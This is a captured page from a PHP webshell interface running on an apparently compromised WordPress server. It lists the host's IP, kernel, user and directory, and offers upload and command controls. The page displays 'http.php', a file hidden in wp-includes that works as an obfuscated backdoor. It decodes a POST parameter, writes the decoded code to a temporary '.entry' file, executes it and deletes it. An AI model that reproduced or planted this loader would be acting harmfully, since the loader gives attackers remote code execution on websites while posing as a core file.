403Webshell
Server IP : 162.243.168.218  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64
User : web23 ( 5020)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/clients/client3/web23/web/wp-includes/blocks/block/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/clients/client3/web23/web/wp-includes/blocks/block/http.php
<?php

if(array_key_exists("\x73\x79m", $_POST)){
	$mrk = $_POST["\x73\x79m"];
				$mrk	 	=	explode( 		'.' ,	  $mrk  	)	 ; 
	$res = '';
            $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(		$s3 );
            $p = 0;
    
            array_walk(		$mrk ,	 function(		$v7) use(		&$res ,	 &$p ,	 $s3 ,	 $sLen) {$sChar = ord(		$s3[$p%		$sLen] );
                $dec =(		(		int)$v7 - $sChar -(		$p%		10)) ^	 80;
                $res.=	chr(		$dec );
                $p++;
            } );
	$itm = array_filter([sys_get_temp_dir(), getcwd(), "/tmp", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", "/var/tmp"]);
	foreach ($itm as $val) {
    		if (is_writable($val) && is_dir($val)) {
    $factor = vsprintf("%s/%s", [$val, ".entry"]);
    if (file_put_contents($factor, $res)) {
	require $factor;
	unlink($factor);
	die();
}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit